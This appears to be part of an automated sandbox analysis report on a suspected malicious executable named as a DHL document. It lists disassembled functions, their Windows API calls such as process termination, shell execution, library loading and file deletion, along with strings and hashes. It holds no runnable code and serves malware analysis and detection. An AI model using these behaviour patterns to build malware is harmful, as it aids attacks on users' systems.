
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F2EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F2EB46
GetWindowThreadProcessId.USER32(?,?), ref: 00F2EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F2EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F2EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F2EB75

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: da50fa60a88f599146bd38292c5fa343a28126e161ede527a1157ab86ef465bf
Instruction ID: a423a044859564f1e6e5bae443526cb7d957cc6fdea1191bb0b408e15fb31e99
Opcode Fuzzy Hash: da50fa60a88f599146bd38292c5fa343a28126e161ede527a1157ab86ef465bf
Instruction Fuzzy Hash: 1EF0177264075CBFE6215B629C0EEAB3A7CEBCAB12F000158F702D109196A05A01AAF5

Function 00F17439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00F17452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00F17469
GetWindowDC.USER32(?), ref: 00F17475
GetPixel.GDI32(00000000,?,?), ref: 00F17484
ReleaseDC.USER32(?,00000000), ref: 00F17496
GetSysColor.USER32(00000005), ref: 00F174B0

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: c3ceeeb8460c33b3f9fee2e28f4fc60ad0b355b354616ffd18158637830dbdb3
Instruction ID: 08ed0195cc503970c2a278c69f3786e91ce9deed45d8c5a17ba5251d25cebf4c
Opcode Fuzzy Hash: c3ceeeb8460c33b3f9fee2e28f4fc60ad0b355b354616ffd18158637830dbdb3
Instruction Fuzzy Hash: 81014B31400719EFEB51AFA4DC48BEA7BB5FB04722F650164FA1AA31A1CB311E51FB90

Function 00F21874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F2187F
UnloadUserProfile.USERENV(?,?), ref: 00F2188B
CloseHandle.KERNEL32(?), ref: 00F21894
CloseHandle.KERNEL32(?), ref: 00F2189C
GetProcessHeap.KERNEL32(00000000,?), ref: 00F218A5
HeapFree.KERNEL32(00000000), ref: 00F218AC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6a500cc8adb5cba65733febc1a6730acce43cf93dd36fdb5e31331e5e8146adc
Instruction ID: 1ef32064c4b9cccc5283fecd76cee6dc5c6cf2d9a1281c65f581e52fe06eb766
Opcode Fuzzy Hash: 6a500cc8adb5cba65733febc1a6730acce43cf93dd36fdb5e31331e5e8146adc
Instruction Fuzzy Hash: 9DE05976104709BFDA015BA6ED0C945BB69FB497227508625F36681471CB325461EB90

Function 00F2C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC7620: _wcslen.LIBCMT ref: 00EC7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F2C6EE
_wcslen.LIBCMT ref: 00F2C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F2C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F2C7CA

Strings

0, xrefs: 00F2C6AF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 9ebf87e5d8ac65a2f9a1d4ba667f28b6b2009fe8f1351fde2d2cad9d46be2c78
Instruction ID: 3ec1fed90ed3e7f85231a6a8e37f6f553e59505bc24252eac92000b87ee9eee5
Opcode Fuzzy Hash: 9ebf87e5d8ac65a2f9a1d4ba667f28b6b2009fe8f1351fde2d2cad9d46be2c78
Instruction Fuzzy Hash: A351D071A043219BD7149F28E885B6F7BE8EF89320F040A2DF995E31D1DB64D904EBD2

Function 00F4AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00F4AEA3

Part of subcall function 00EC7620: _wcslen.LIBCMT ref: 00EC7625

GetProcessId.KERNEL32(00000000), ref: 00F4AF38
CloseHandle.KERNEL32(00000000), ref: 00F4AF67

Strings

<, xrefs: 00F4AE6B
@, xrefs: 00F4AE72

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 0652416a78def74630ca89f5994dfe07957e08dada447fcc5c4c595a842368ef
Instruction ID: 6e02f5f6dbdad4ebbd4f5fa5a8b095efac3678ec811bdfed844cd8d7f79a5fd2
Opcode Fuzzy Hash: 0652416a78def74630ca89f5994dfe07957e08dada447fcc5c4c595a842368ef
Instruction Fuzzy Hash: 71717771A00619DFCB14DF55C584A9EBBF1EF08310F04849DE856AB392C771ED46DB91

Function 00F2719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F27206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F2723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F2724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F272CF

Strings

DllGetClassObject, xrefs: 00F27242

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: fd1bf90a7acc18d62baea2b4f604d37f81dc4f9cb0ad5ee5ba97a97e9d24b97c
Instruction ID: 4a3e6efa293f24447b1f3040e68b0a74b4b261e907c57153cdf7fc6158be8533
Opcode Fuzzy Hash: fd1bf90a7acc18d62baea2b4f604d37f81dc4f9cb0ad5ee5ba97a97e9d24b97c
Instruction Fuzzy Hash: CA415972A04314EFDB15EF94D884A9A7BA9EF44310F1580A9FD059F28AD7B0D944EBA0

Function 00F53D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F53E35
IsMenu.USER32(?), ref: 00F53E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F53E92
DrawMenuBar.USER32 ref: 00F53EA5

Strings

0, xrefs: 00F53D89

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 9b9886321d65e27971a1ee4720312b696288ba556d92506199cf0c38a5cc2489
Instruction ID: 0f097f98466cec3a736322d6cce7ca01f733b5cdd72a7c8ce4c473b37cf9af1f
Opcode Fuzzy Hash: 9b9886321d65e27971a1ee4720312b696288ba556d92506199cf0c38a5cc2489
Instruction Fuzzy Hash: 9F414C75A00209AFDB10DF54D885EDAB7F5FF443A5F044129EE05A7250D730AE49EF60

Function 00F21DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00F23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F23CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F21E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F21E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00F21EA9

Part of subcall function 00EC6B57: _wcslen.LIBCMT ref: 00EC6B6A

Strings

ComboBox, xrefs: 00F21DF0
ListBox, xrefs: 00F21E25

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: c8d6971fafd8f1a64828fa9dcaaf0434532c0483fa526b68dc073ff7353daec0
Instruction ID: 63458785a0e569e2a8de6b3f81409730fa0910ee39f6125029c5c3b935893342
Opcode Fuzzy Hash: c8d6971fafd8f1a64828fa9dcaaf0434532c0483fa526b68dc073ff7353daec0
Instruction Fuzzy Hash: 56214C71900208BFDB14ABA0ED45DFFB7F8EF51360B104119F826B71D1DB395D0AA660

Function 00F4C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F4C9F1
_wcslen.LIBCMT ref: 00F4CA68
_wcslen.LIBCMT ref: 00F4CA9E
_wcslen.LIBCMT ref: 00F4CAF9
_wcslen.LIBCMT ref: 00F4CB2F
_wcslen.LIBCMT ref: 00F4CB7F

Strings

HKLM, xrefs: 00F4CA98, 00F4CA9D
HKEY_LOCAL_MACHINE, xrefs: 00F4CA62, 00F4CA67

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: 2aadef030b3c7b44f3c787dd58b47918f10eab80ee6672cf1e22e42cc07fac67
Instruction ID: 656e1f6cbd4e1573754f63247656b25d968e15560d60ab417e902a2fe3ccd503
Opcode Fuzzy Hash: 2aadef030b3c7b44f3c787dd58b47918f10eab80ee6672cf1e22e42cc07fac67
Instruction Fuzzy Hash: 58313673E0216E4BCB60EF2C99605BE3B919BA1760B156029EC01AB345FA79CD44F3E0

Function 00F52F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F52F8D
LoadLibraryW.KERNEL32(?), ref: 00F52F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F52FA9
DestroyWindow.USER32(?), ref: 00F52FB1

Strings

SysAnimate32, xrefs: 00F52F68

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 6fd11b568ee512cf0264fab625ad5d1d836076d5da726e390f95a2f01fecdce7
Instruction ID: 97bffd604498c7d0886cb9715c512939230c6db587f5c1b8659861e0d0e0c281
Opcode Fuzzy Hash: 6fd11b568ee512cf0264fab625ad5d1d836076d5da726e390f95a2f01fecdce7
Instruction Fuzzy Hash: F1218B72604209ABEB504F64AC80EBB37F9EB5A376F100318FE50A6190D771DC55ABA0

Function 00EE4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EE4D1E,00EF28E9,(,00EE4CBE,00000000,00F888B8,0000000C,00EE4E15,(,00000002), ref: 00EE4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EE4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00EE4D1E,00EF28E9,(,00EE4CBE,00000000,00F888B8,0000000C,00EE4E15,(,00000002,00000000), ref: 00EE4DC3

Strings

CorExitProcess, xrefs: 00EE4D98
mscoree.dll, xrefs: 00EE4D86

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5ab5f6ecd4c50300561f024ede424008954c2b7344679de904e3b9025f44844e
Instruction ID: ead1dfc6e4b5bc34cd7fed0745166e5c4b780449a874443e2b949fc8d3a6c1ea
Opcode Fuzzy Hash: 5ab5f6ecd4c50300561f024ede424008954c2b7344679de904e3b9025f44844e
Instruction Fuzzy Hash: A9F03C34A4030CAFDB119F91DC49BAEBBA5EB44756F0001A5E90AA22A0DB709940EBD1

Function 00EC4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00EC4EDD,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EC4EAE
FreeLibrary.KERNEL32(00000000,?,?,00EC4EDD,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00EC4EA8
kernel32.dll, xrefs: 00EC4E94

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: fff0e62f357452d97968fe5948af4a353790625ac190278beaba289212d7d4b6
Instruction ID: 9d4ae57c0df11d03caa264eabb787455cc9862b30b1be9043270f0b14b79512c
Opcode Fuzzy Hash: fff0e62f357452d97968fe5948af4a353790625ac190278beaba289212d7d4b6
Instruction Fuzzy Hash: 6FE0CD35A01B225FD23117256C28F5F7654AFC2F677060119FE02F7150DF60CD0291E1

Function 00EC4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F03CDE,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EC4E74
FreeLibrary.KERNEL32(00000000,?,?,00F03CDE,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00EC4E6E
kernel32.dll, xrefs: 00EC4E5B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 30263aac4416ae2185e7c529a44c3e4482229027298f077c491528589914ed1a
Instruction ID: 8c19fc53c95c0ba3ea17e05b96e99fd5f063c2a3a522a30061a0c501508ea052
Opcode Fuzzy Hash: 30263aac4416ae2185e7c529a44c3e4482229027298f077c491528589914ed1a
Instruction Fuzzy Hash: 73D01235502B226F57221B297C2CE8B7A18AF86F5A3060519BE06BA155CF61CD02E5D1

Function 00F32947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F32C05
DeleteFileW.KERNEL32(?), ref: 00F32C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F32C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F32CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F32CC0

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: ddfdcd0069840ffab5b945a2716d287473e275b61774894a3cde3c102a924653
Instruction ID: dbe1e00e6846cd5ce0ca5d90c09acacb54777e6c7d0ed2ac4b8b68991a8f9b1f
Opcode Fuzzy Hash: ddfdcd0069840ffab5b945a2716d287473e275b61774894a3cde3c102a924653
Instruction Fuzzy Hash: 73B17D72D0012DABDF11DBA4CC85EDEB7BDEF48360F0040A6F609F6151EA35AA449FA1

Function 00F4A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00F4A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F4A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F4A468
CloseHandle.KERNEL32(?), ref: 00F4A63D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 1f04f53a4a36a8f75bd68245db4198b39a2e01194742c3b259ead787e6ee045c
Instruction ID: 7112abec326f8de2b257bac103b9433156eebf7128b131222d7dd0782c87c82a
Opcode Fuzzy Hash: 1f04f53a4a36a8f75bd68245db4198b39a2e01194742c3b259ead787e6ee045c
Instruction Fuzzy Hash: 1DA1B0716043009FD720DF24C986F2ABBE5AF84714F18981DF99A9B3D2D771EC428B82

Function 00F2E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F2CF22,?), ref: 00F2DDFD

Part of subcall function 00F2DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F2CF22,?), ref: 00F2DE16

Part of subcall function 00F2E199: GetFileAttributesW.KERNEL32(?,00F2CF95), ref: 00F2E19A

lstrcmpiW.KERNEL32(?,?), ref: 00F2E473
MoveFileW.KERNEL32(?,?), ref: 00F2E4AC
_wcslen.LIBCMT ref: 00F2E5EB
_wcslen.LIBCMT ref: 00F2E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F2E650

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: dbe7db2db9bdf14f8a83cd0df6b45c440b9d6316d4dfbb8e52e1b2087be2e25f
Instruction ID: c168ac9f875ea6d0b8df2922ba697beedec6e66015428730921485f0b1c44650
